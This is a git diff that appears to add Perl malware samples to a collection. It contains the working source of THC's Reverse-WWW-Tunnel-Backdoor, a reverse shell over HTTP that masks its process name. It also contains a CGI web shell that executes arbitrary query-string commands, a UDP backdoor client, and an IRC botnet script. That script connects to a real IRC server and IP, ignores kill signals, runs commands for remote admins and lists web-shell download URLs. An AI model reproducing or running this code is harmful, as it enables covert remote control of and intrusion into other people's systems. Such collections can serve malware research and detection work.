+# available at the website above in the "Articles" section.
+#
+
+# Greets to all THC, ADM, arF and #bluebox guys
+
+# verified to work on Linux, Solaris, AIX and OpenBSD
+
+# BUGS: some Solaris machines: select(3) is broken, won't work there
+#	on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
+#	we can't make proper receive checks here. Workaround implemented.
+#
+# HISTORY:
+# v1.6: included www-proxy authentication ;-))
+# v1.4: porting to various unix types (and I thought perl'd be portable...)
+# v1.3: initial public release of the paper including this tool
+
+#
+# GENERAL CONFIG (except for $MASK, everything must be the same
+#		  for MASTER and SLAVE is this section!)
+#
+$CGI_PREFIX="/cgi-bin/order?";	# should look like cgi. "?" as last char!
+$MASK="vi";			# for masking the program's process name
+$PASSWORD="THC";		# anything, nothing you have to rememeber
+				# (not a real "password" anyway)
+#
+# MASTER CONFIG (specific for the MASTER)
+#
+$LISTEN_PORT=8080;	# on which port to listen (80 [needs root] or 8080)
+$SERVER="127.0.0.1";	# the host to run on (ip/dns) (the SLAVE needs this!)
+
+#
+# SLAVE CONFIG (specific for the SLAVE)
+#
+$SHELL="/bin/sh -i";	# program to execute (e.g. /bin/sh)
+$DELAY="3";		# time to wait for output after your command(s)
+#$TIME="00:01";		# time when to connect to the master (unset if now)
+#$DAILY="yes";		# tries to connect once daily if set with something
+#$PROXY="127.0.0.1";	# set this with the Proxy if you must use one
+#$PROXY_PORT="3128";	# set this with the Proxy Port if you must use one
+#$PROXY_USER="user";	# username for proxy authentication
+#$PROXY_PASSWORD="pass";	# password for proxy authentication
+#$DEBUG="";		# for debugging purpose, turn off when in production
+$BROKEN_RECV="yes";	# For AIX & OpenBSD, NOT for Linux & Solaris
+
+# END OF CONFIG		# nothing for you to do after this point #
+
+################## BEGIN MAIN CODE ##################
+
+require 5.002;
+use Socket;
+
+$|=1;				# next line changes our process name
+if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";}  $0=$MASK; }
+undef $DAILY   if (! $TIME);
+if ( !($PROXY) || !($PROXY_PORT) ) {
+	undef $PROXY;
+	undef $PROXY_PORT;
+}
+$protocol = getprotobyname('tcp');
+
+if ($ARGV[0] ne "") {
+	if ($ARGV[0] eq "-h") {
+		print STDOUT "no commandline option : daemon mode\n"; 
+		print STDOUT "using \"-h\" as option  : this help\n";
+		print STDOUT "any other option      : slave mode\n";
+		exit(0);
+	} else {
+		print STDOUT "starting in slave mode\n";
+		$SLAVE_MODE = "yeah";
+	}
+}
+
+if (! $SLAVE_MODE) { 
+	&master;
+} else {
+	&slave;
+}
+# END OF MAIN FUNCTION
+
+############### SLAVE FUNCTION ###############
+
+sub slave {
+	$pid = 0;
+	if ($PROXY) {		# setting the real config (for Proxy Support)
+		$REAL_SERVER = $PROXY;
+		$REAL_PORT = $PROXY_PORT;
+		$REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT
+			. $CGI_PREFIX;
+		$PROXY_SUFFIX = "Pragma: no-cache\n";
+		if ( $PROXY_USER && USER_PASSWORD ) {
+			&base64encoding;
+			$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
+		}
+	} else {
+		$REAL_SERVER = $SERVER;
+		$REAL_PORT = $LISTEN_PORT;
+		$REAL_PREFIX = "GET " . $CGI_PREFIX;
+	}
+AGAIN:	if ($pid) { kill 9, $pid; }
+	if ($TIME) {			# wait until the specified $TIME
+		$TIME =~ s/^0//;	$TIME =~ s/:0/:/;
+		(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
+			= localtime(time);
+		$t=$hour . ":" . $min;
+		while ($TIME ne $t) {
+			sleep(28); # every 28 seconds we look at the watch
+			(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
+				= localtime(time);
+			$t=$hour . ":" .$min;
+		}
+	}
+	print STDERR "Slave activated\n"	if $DEBUG;
+	if ($DAILY) {			# if we must connect daily, we'll
+		if (fork) {		# fork the daily shell process to
+			sleep(69);	# ensure the master control process
+			goto AGAIN;	# won't get stuck by a fucking cmd
+		}			# the user executed.
+	print STDERR "forked\n" if $DEBUG;
+	}
+	$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
+	$remote = sockaddr_in($REAL_PORT, $address);
+	$forked = 0;
+GO:	close(THC);
+	socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
+		or die "can't create socket\n";
+	setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
+	if (! $forked) {		# fork failed? fuck, let's try again
+		pipe R_IN, W_IN;        select W_IN;  $|=1;
+		pipe R_OUT, W_OUT;      select W_OUT; $|=1;
+		$pid = fork;
+		if (! defined $pid) {
+			close THC;
+			close R_IN;	close W_IN;
+			close R_OUT;	close W_OUT;
+			goto GO;
+		}
+		$forked = 1;
+	}
+	if (! $pid) {           # this is the child process (execs $SHELL)
+		close R_OUT;	close W_IN;	close THC;
+		print STDERR "forking $SHELL in child\n"	if $DEBUG;
+		open STDIN,  "<&R_IN";
+		open STDOUT, ">&W_OUT";
+		open STDERR, ">&W_OUT";
+		exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
+		close R_IN;     close W_OUT;
+		exit(0);
+	} else {                # this is the parent (data control + network)
+		close R_IN;
+		sleep($DELAY);	# we wait $DELAY for the commands to complete
+		vec($rs, fileno(R_OUT), 1) = 1;
+		print STDERR "before: allwritten2stdin\n"	if $DEBUG;
+		select($r = $rs, undef, undef, 30);
+		print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
+		sleep(1);	# The following readin of the command output
+		$output = "";	# looks weird. It must be! every system
+		vec($ws, fileno(W_OUT), 1) = 1;     # behaves different :-((
+		print STDERR "before: readwhiledatafromstdout\n"   if $DEBUG;
+		while (select($w = $ws, undef, undef, 1)) {
+			read R_OUT, $readout, 1 || last;
+			$output = $output . $readout;
+		}
+		print STDERR "after : readwhiledatafromstdout\n"   if $DEBUG;
+		print STDERR "before: fucksunprob\n"	if $DEBUG;
+		vec($ws, fileno(W_OUT), 1) = 1;
+		while (! select(undef, $w=$ws, undef, 0.001)) {
+			read R_OUT, $readout, 1 || last;
+			$output = $output . $readout;
+		}
+		print STDERR "after : fucksunprob\n"	if $DEBUG;
+		print STDERR "send 0byte to stdout, fail->exit\n"   if $DEBUG;
+		print W_OUT "\000" || goto ENDE;
+		print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
+		while (1) {
+			read R_OUT, $readout, 1 || last;
+			last  if ($readout eq "\000");
+			$output = $output . $readout;
+		}
+		print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
+		&uuencode;	# does the encoding of the shell output
+		$encoded = $REAL_PREFIX . $encoded;
+		$encoded = $encoded . $PROXY_SUFFIX	if ($PROXY);
+		$encoded = $encoded . "\n";
+		print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
+		connect(THC, $remote) || goto ENDE;	# connect to master
+		print STDERR "send encoded data, fail->exit\n" if $DEBUG;
+		send (THC, $encoded, 0) || goto ENDE;	# and send data
+		$input = "";
+		vec($rt, fileno(THC), 1) = 1;  # wait until master sends reply
+		print STDERR "before: wait4answerfromremote\n"	if $DEBUG;
+		while (! select($r = $rt, undef, undef, 0.00001)) {}
+		print STDERR "after : wait4answerfromremote\n"	if $DEBUG;
+		print STDERR "read data from socket until eod\n" if $DEBUG;
+		$error="no";
+		while (1) {		# read until EOD (End Of Data)
+			print STDERR "?"	if $DEBUG;
+	# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
+			recv (THC, $readin, 1, 0) || undef $error;
+			if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
+			print STDERR "!"	if $DEBUG;
+			goto OK  if (($readin eq "\000") or ($readin eq "\n")
+				or ($readin eq ""));
+			$input = $input . $readin;
+		}
+OK:		print STDERR "\nall data read, entering OK\n"	if $DEBUG;
+		$input =~ s/\n//gs;
+		&uudecode;		# decoding the data from the master
+		print STDERR "if password not found -> exit\n"	if $DEBUG;
+		goto ENDE  if ( $decoded =~ m/^$PASSWORD/s == 0);
+		$decoded =~ s/^$PASSWORD//;
+		print STDERR "writing input data to $SHELL\n"	if $DEBUG;
+		print W_IN "$decoded" || goto ENDE;	# sending the data
+		sleep(1);				# to the shell proc.
+		print STDERR "jumping to GO\n"	if $DEBUG;
+		goto GO;
+	}
+ENDE:	kill 9, $pid;	$pid = 0;
+	exit(0);
+} # END OF SLAVE FUNCTION
+
+############### MASTER FUNCTION ###############
+
+sub master {
+	socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
+		or die "can't create socket\n";
+	setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
+	bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
+	listen(THC, 3) || die "can't listen\n";		# print the HELP
+	print STDOUT '
+Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ...
+
+Introduction: 	Wait for your SLAVE to connect, examine it\'s output and then
+		type in your commands to execute on SLAVE. You\'ll have to
+		wait min. the set $DELAY seconds before you get the output
+		and can execute the next stuff. Use ";" for multiple commands.
+		Trying to execute interactive commands may give you headache
+		so beware. Your SLAVE may hang until the daily connect try
+		(if set - otherwise you lost).
+		You also shouldn\'t try to view binary data too ;-)
+		"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
+		friends if you don\'t like using vi in a delayed line mode ;-)
+		To exit this program on any time without doing harm to either
+		MASTER or SLAVE just press Control-C.
+		Now have fun.
+';
+
+YOP:	print STDOUT "\nWaiting for connect ...";
+	$remote=accept (S, THC)  ||  goto YOP;		# get the connection
+	($r_port, $r_slave)=sockaddr_in($remote);	# and print the SLAVE
+	$slave=gethostbyaddr($r_slave, AF_INET);	# data.
+	$slave="unresolved" if ($slave eq "");
+	print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
+	select S;	$|=1;
+	select STDOUT;	$|=1;
+	$input = "";
+	vec($socks, fileno(S), 1) = 1;
+	$error="no";
+	while (1) {			# read the data sent by the slave
+		while (! select($r = $socks, undef, undef, 0.00001)) {}
+		recv (S, $readin, 80, 0) || undef $error;
+		if ((! $error) and (! $BROKEN_RECV)) {
+		    print STDOUT "[disconnected]\n";
+		}
+		$readin =~ s/\r//g;
+		$input = $input . $readin;
+		last  if ( $input =~ m/\n\n/s );
+	}
+	&hide_as_broken_webserver  if ( $input =~ m/$CGI_PREFIX/s == 0 );
+	$input =~ s/^.*($CGI_PREFIX)\??//s;
+	$input =~ s/\n.*$//s;
+	&uudecode;		# decoding the data from the slave
+	&hide_as_broken_webserver  if ( $decoded =~ m/^$PASSWORD/s == 0 );
+	$decoded =~ s/^$PASSWORD//s;
+	$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
+	print STDOUT "$decoded";	# showing the slave output to the user
+	$output = <STDIN>;		# and get his input.
+	&uuencode;		# encode the data for the slave
+	send (S, $encoded, 0) || die "\nconnection lost!\n";	# and send it
+	close (S);
+	print STDOUT "sent.\n";
+	goto YOP;		# wait for the next connect from the slave
+} # END OF MASTER FUNCTION
+
+###################### MISC. FUNCTIONS #####################
+
+sub uuencode {	# does the encoding stuff for error-free data transfer via WWW
+	$output = $PASSWORD . $output;		# PW is for error checking and
+        $uuencoded = pack "u", "$output";	# preventing sysadmins from
+        $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-'	# sending you weird
+                        /'zcadefghjklmnopqrstuv'	# data. No real
+                        /;				# security!
+        $uuencoded =~ tr/"'"/'b'/;
+	if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
+		$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
+		$cut_length = 4099 - (length $REAL_PREFIX);
+		$uuencoded = pack "a$cut_length", $uuencoded
+			if ($codelength > 4111);
+	}
+        $encoded = $uuencoded;
+	$encoded = $encoded . " HTTP/1.0\n"    if ($SLAVE_MODE);
+} # END OF UUENCODE FUNCTION
+
+sub uudecode {	# does the decoding of the data stream
+	$input =~     tr/'zcadefghjklmnopqrstuv'
+			/'\n)=(:;&><,#$*%]!\@"`\\\-'
+			/;
+	$input =~     tr/'b'/"'"/;
+	$decoded = unpack "u", "$input";
+} # END OF UUDECODE FUNCTION
+
+sub base64encoding {	# does the base64 encoding for proxy passwords
+	$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
+	$encoded_string = substr(pack('u', $encode_string), 1);
+	chomp($encoded_string);
+	$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
+	$padding = (3 - length($encode_string) % 3) % 3;
+	$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
+	$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
+} # END OF BASE64ENCODING FUNCTION
+
+sub hide_as_broken_webserver {	# invalid request -> look like broken server
+	send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
+		 "<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
+	close S;
+	print STDOUT "Warning! Illegal server access!\n";   # report to user
+	goto YOP;
+} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
+
+# END OF PROGRAM # (c) 1998 by <vh@reptile.rug.ac.be>
diff --git a/Perl/Backdoor.Perl.Agent.a b/Perl/Backdoor.Perl.Agent.a
new file mode 100644
index 00000000..0496ea30
--- /dev/null
+++ b/Perl/Backdoor.Perl.Agent.a
@@ -0,0 +1,93 @@
+############################################################
+## Network security team                                  ##
+############################################################
+##Coder: Ins                                              ##
+############################################################
+##Ob dannom scripte: Eto prostoj shell napisannyj na perle##
+############################################################
+
+#V celjah nesankcionirovannogo dostupa smeni etot parol`"
+#$pwd='';
+
+print "Content-type: text/html\n\n";
+&read_param();
+if (!defined$param{dir}){$param{dir}="/"};
+if (!defined$param{cmd}){$param{cmd}="ls -la"};
+##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
+
+print << "[ins1]";
+<head>
+<title>::Network Security Team::</title>
+<font size=3 face=verdana><b>Network security team :: CGI Shell</b>
+<font size=-2 face=verdana><br><br>
+<style>
+BODY, TD { font-family: Tahoma; font-size: 12px; }
+INPUT.TEXT  {
+font-family : Arial;
+font-size : 8pt;
+color : Black;
+width : 100%;
+background-color : #F1F1F1;
+border-style : solid;
+border-width : 0px;
+border-color : Silver;
+}
+INPUT.BUTTON  {
+font-family : Arial;
+font-size : 8pt;
+width : 100px;
+border-width : 1px;
+color : Black;
+background-color : D1D1D1;
+border-color : silver;
+border-style : solid;
+}
+</style>
+</head>
+<body bgcolor=#B9B9B9>
+Vvedite zapros:
+<table width=500 bgcolor=D9D9D9><tr><td>
+[ins1]
+
+print "cd $param{dir}&&$param{cmd}";
+
+print << "[ins2]";
+</td></tr></table>
+Otvet na zapros:
+<table width=500 bgcolor=D9D9D9><tr><td><pre>
+[ins2]
+
+#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
+open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
+while ($line=<FILEHANDLE>){print "$line";};
+close (FILEHANDLE);
+
+print << "[ins3]";
+</pre></td></tr></table>
+<form action=pshell.cgi>
+DIR dlja sledujushego zaprosa:
+<input type=text class="TEXT" name=dir value=$param{dir}>
+Sledujushij zapros:
+<input type=text class="TEXT" name=cmd value=$param{cmd}>
+<input type=submit class="button" value="Submit">
+<input type=reset class="button" value="Reset">
+</form>
+</body>
+</html>
+[ins3]
+
+sub read_param {
+$buffer = "$ENV{'QUERY_STRING'}";
+@pairs = split(/&/, $buffer);
+foreach $pair (@pairs)
+        {
+        ($name, $value) = split(/=/, $pair);
+        $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $value =~ s/\+/ /g;
+        $value =~ s/%20/ /g;
+        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $param{$name} = $value;
+        }
+}
+
+#########################<<KONEC>>#####################################
\ No newline at end of file
diff --git a/Perl/Backdoor.Perl.Anarchy b/Perl/Backdoor.Perl.Anarchy
new file mode 100644
index 00000000..5058d3a4
--- /dev/null
+++ b/Perl/Backdoor.Perl.Anarchy
@@ -0,0 +1,48 @@
+
+use IO::Socket;
+use Getopt::Std;
+
+getopts('s:p:h', \%opt)||die("Error: Unable to get command line options !!!\n");
+
+if(defined($opt{'h'})) { \&usage() }
+if(defined($opt{'s'})) { $server=$opt{'s'} } else { \&usage() }
+if(defined($opt{'p'})) { $port=$opt{'p'} } else { \&usage() }
+
+
+$|=1;
+$maxlen=1024;
+
+$sock=IO::Socket::INET->new(Proto=>'udp')
+or die("Error: Cannot initialize socket !!!\n");
+$ipaddr=inet_aton($server);
+$portaddr=sockaddr_in($port, $ipaddr);
+
+
+print("\nAUDP Backdoor started.\n");
+print("======================\n");
+
+while(1) {
+ print("=> ");
+ $mesg=<STDIN>;
+ chomp $mesg;
+ if($mesg=~/^\s*(exit)|(quit)\s*/i) { exit(0) }
+ if($mesg!~/^\s*$/) {
+  send($sock, $mesg."\n", 0, $portaddr)==length($mesg."\n");
+  
+  while($portaddr=recv($sock, $msg, $maxlen, 0)) {
+   if($msg=~/^\-end\.$/) { last } else {
+    print $msg;
+   }
+  }
+ }
+} 
+
+
+
+sub usage() {
+   print("\nAUDP - Programmed by Anarchy\n");
+   print("============================\n");
+   print("Usage: AUDP -s <host> -p <port>\n\n");
+   exit 1;
+}
+
diff --git a/Perl/Backdoor.Perl.IRCBot.aa b/Perl/Backdoor.Perl.IRCBot.aa
new file mode 100644
index 00000000..16f1109f
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.aa
@@ -0,0 +1,1905 @@
+####################################
+
+use HTTP::Request;
+use LWP::UserAgent;
+my $processo = 'usr/sbin/httpd';
+my $linas_max='5';
+my $sleep='10';
+my $cmd="http://201.218.196.231/fastspread.txt?";
+my $id="http://201.218.196.231/fastspread.txt?";
+############################################
+my @adms=("chireo");
+my @canais=("#chireox");
+#Put your channel here
+my @nickname = ("XB0Tscan-");
+my $nick = $nickname[rand scalar @nickname];
+#Nickname of bot 
+my $ircname ='ivil';
+chop (my $realname = 'mack');
+#IRC name and Realname 
+$servidor='irc.indoirc.net' unless $servidor;
+my $porta='6667'; 
+my $exploitcounter = 100;
+my @User_Agent = &Agent();
+############################################
+$SIG{'INT'} = 'IGNORE';
+$SIG{'HUP'} = 'IGNORE';
+$SIG{'TERM'} = 'IGNORE';
+$SIG{'CHLD'} = 'IGNORE';
+$SIG{'PS'} = 'IGNORE';
+use IO::Socket;
+use Socket;
+use IO::Select;
+chdir("/");
+
+#Connect
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Masalah fork: $!" unless defined($pid);
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+$sel_cliente = IO::Select->new();
+sub sendraw {
+	if ($#_ == '1') {
+		my $socket = $_[0];
+		print $socket "$_[1]\n";
+
+	} else {
+		print $IRC_cur_socket "$_[0]\n";
+	}
+}
+
+sub conectar {
+	my $meunick = $_[0];
+	my $servidor_con = $_[1];
+	my $porta_con = $_[2];
+
+	my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
+	PeerPort=>$porta_con) or return(1);
+	if (defined($IRC_socket)) {
+		$IRC_cur_socket = $IRC_socket;
+		$IRC_socket->autoflush(1);
+		$sel_cliente->add($IRC_socket);
+		$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+		$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+		$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+		$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+		nick("$meunick");
+		sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+		sleep 1;
+	}
+}
+
+my $line_temp;
+while( 1 ) {
+	while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+#	select(undef, undef, undef, 0.01); #sleeping for a fraction of a second keeps the script from running to 100 cpu usage ^_^
+	delete($irc_servers{''}) if (defined($irc_servers{''}));
+	my @ready = $sel_cliente->can_read(0);
+	next unless(@ready);
+	foreach $fh (@ready) {
+		$IRC_cur_socket = $fh;
+		$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+		$nread = sysread($fh, $msg, 4096);
+		if ($nread == 0) {
+			$sel_cliente->remove($fh);
+			$fh->close;
+			delete($irc_servers{$fh});
+		}
+		@lines = split (/\n/, $msg);
+		for(my $c=0; $c<= $#lines; $c++) {
+			$line = $lines[$c];
+			$line=$line_temp.$line if ($line_temp);
+			$line_temp='';
+			$line =~ s/\r$//;
+			unless ($c == $#lines) {
+				parse("$line");
+			} else {
+				if ($#lines == 0) {
+					parse("$line");
+				} elsif ($lines[$c] =~ /\r$/) {
+					parse("$line");
+				} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+					parse("$line"); 
+				} else {
+					$line_temp = $line;
+				}
+			}
+		}
+	}
+}
+
+sub parse {
+	my $servarg = shift;
+	if ($servarg =~ /^PING \:(.*)/) {
+		sendraw("PONG :$1");
+	} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+		my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
+		if ($args =~ /^\001VERSION\001$/) {
+			notice("$pn", "\001VERSION mIRC v6.17 VooDoo\001");
+		}
+		if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
+			if ($onde eq "$meunick"){
+				shell("$pn", "$args");
+			}
+#End of Connect
+			if ($args =~ /^(\Q$meunick\E|\!x)\s+(.*)/ ) {
+				my $natrix = $1;
+				my $arg = $2;
+				if ($arg =~ /^\!(.*)/) {
+					ircase("$pn","$onde","$1") unless ($natrix eq "!x" and $arg =~ /^\!nick/);
+				} elsif ($arg =~ /^\@(.*)/) {
+					$ondep = $onde;
+					$ondep = $pn if $onde eq $meunick;
+					bfunc("$ondep","$1");
+				} else {
+					shell("$onde", "$arg");
+				}
+			}
+		}
+	}
+######################### End of prefix
+	elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+		if (lc($1) eq lc($meunick)) {
+			$meunick=$4;
+			$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+		}
+	} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+		nick("$meunick|".int rand(999999));
+	} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+		$meunick = $2;
+		$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+		$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+		foreach my $canal (@canais) {
+			sendraw("JOIN $canal $key");
+		}
+	}
+}
+
+sub bfunc {
+	my $printl = $_[0];
+	my $funcarg = $_[1];
+	if (my $pid = fork) {
+		waitpid($pid, 0);
+	} else {
+		if (fork) {
+			exit;
+		} else {
+
+			if ($funcarg =~ /^killme/) {
+				sendraw($IRC_cur_socket, "QUIT :");
+				$killd = "kill -9 ".fork;
+				system (`$killd`);
+			}
+######################
+#     Commands       #
+######################
+if ($funcarg =~ /^hello/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] WAZaaaaaaaa !");
+}
+
+if ($funcarg =~ /^c99/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://no-hack.net/shells/c99.txt !");
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://www.topnlpsites.com/images/gif/c99.txt !");
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://www.avramovic.info/razno/c99.txt !");
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://usuarios.lycos.es/lannetboy/shells/c99.txt !");
+}
+
+if ($funcarg =~ /^r57/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://www.army5.com.br/r57.txt !");
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://www.id-nobody.com/shell/r57.txt !");
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://system-nemesis.us/shell/r57.txt !");
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://no-hack.net/shells/r57.txt !");
+}
+if ($funcarg =~ /^md5 (.*)/) {
+$md5=$1;
+my @gdataonline=gdataonline($md5);
+my @cry=cry($md5);
+my @alim=alim($md5);
+my @xpz=xpz($md5);
+my @rend=rend($md5);
+my @ice=ice($md5);
+
+}
+
+sub ice(){
+$hashget = LWP::UserAgent->new;
+$resp = $hashget->get("http://ice.breaker.free.fr/md5.php?hash=$md5"); # checks gdata for hash
+  $hashans = $resp->content;
+  if ($hashans =~ m/<b><br><br> - (.*?)<br><br><br>/g){
+     $crack = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]ice.breaker.free.fr  : $crack");
+}else{
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]ice.breaker.free.fr  : Hash Not Found.");
+}
+}
+
+sub rend(){
+$hashget = LWP::UserAgent->new;
+$resp = $hashget->get("http://md5.rednoize.com/?p&s=md5&q=$md5"); # checks gdata for hash
+  $hashans = $resp->content;
+  if ($hashans =~ m/<(.*)/g){
+     $crack = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.rednoize.com     : $crack");
+}else{
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.rednoize.com     : Hash Not Found.");
+}
+}
+
+
+sub xpz(){
+$hashget = LWP::UserAgent->new;
+$resp = $hashget->get("http://md5.xpzone.de/?string=".$md5."&mode=decrypt"); # checks gdata for hash
+  $hashans = $resp->content;
+  if ($hashans =~ m/Code: <b>(.*)<\/b><br>/g){
+     $crack = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.xpzone.de        : $crack");
+}else{
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.xpzone.de        : Hash Not Found.");
+}
+}
+
+
+sub ben(){
+$hashget = LWP::UserAgent->new;
+$resp = $hashget->get("http://md5.benramsey.com/md5.php?hash=$md5"); # checks gdata for hash
+  $hashans = $resp->content;
+  if ($hashans =~ m/<string><\!\[CDATA\[(.+?)\]\]><\/string>/g){
+     $crack = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.benramsey.com    : $crack");
+}else{
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.benramsey.com    : Hash Not Found.");
+}
+}
+
+
+sub alim(){
+$hashget = LWP::UserAgent->new;
+$resp = $hashget->get("http://alimamed.pp.ru/md5/?md5e=&md5d=$md5"); # checks gdata for hash
+  $hashans = $resp->content;
+  if ($hashans =~ m/<b>(.+?)<\/b>/g){
+     $crack = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]alimamed.pp.ru       : $crack");
+}else{
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]alimamed.pp.ru       : Hash Not Found.");
+}
+}
+
+
+sub cry(){
+$hashget = LWP::UserAgent->new;
+$resp = $hashget->get("http://us.md5.crysm.net/find?md5=$md5"); # checks gdata for hash
+  $hashans = $resp->content;
+  if ($hashans =~ m/<li>(.+?)<\/li>/g){
+     $crack = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]us.md5.crysm.net     : $crack");
+}else{
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]us.md5.crysm.net     : Hash Not Found.");
+}
+}
+
+
+sub gdataonline(){
+$hashget = LWP::UserAgent->new;
+$resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$md5"); # checks gdata for hash
+  $hashans = $resp->content;
+  if (
+$hashans =~ m\width="35%"><b>([  -_a-z0-9.*?&=;<>/""]{1,25})</b></td>\
+)
+
+{
+     $crack = $1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]gdataonline.com      : $crack");
+}else{
+sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]gdataonline.com      : Hash Not Found");
+}
+}
+
+
+
+
+			if ($funcarg =~ /^milw0rm/) {
+				my @ltt=();
+				my @bug=();
+				my $x;
+				my $page="";
+				my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
+				print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+				my @r = <$socke>;
+				$page="@r";
+				close($socke);
+				while ($page =~  m/<title>(.*)</g){
+					$x = $1;
+					if ($x =~ /\&lt\;/) {
+						$x =~ s/\&lt\;/</g;
+					}			
+					if ($x !~ /milw0rm/) {
+						push (@bug,$x);
+					}
+				}
+				while ($page =~  m/<link.*expl.*([0-9]...)</g) {
+					if ($1 !~ m/milw0rm.com|exploits|en/){
+						push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
+					}
+				}
+				sendraw($IRC_cur_socket, "PRIVMSG $printl :9 [Milw0rm] 9:.4 Latest exploits :");
+				foreach $x (0..(@ltt - 1)) {
+					sendraw($IRC_cur_socket, "PRIVMSG $printl :9 [Milw0rm] 9:.4  $bug[$x] - $ltt[$x]");
+					sleep 1;
+				}
+			}
+
+#####################
+# Chk The News PacketStorm#
+######################
+if ($funcarg =~ /^packetstorm/) { 
+	my $c=0;
+	my $x;
+	my @ttt=();
+	my @ttt1=(); 
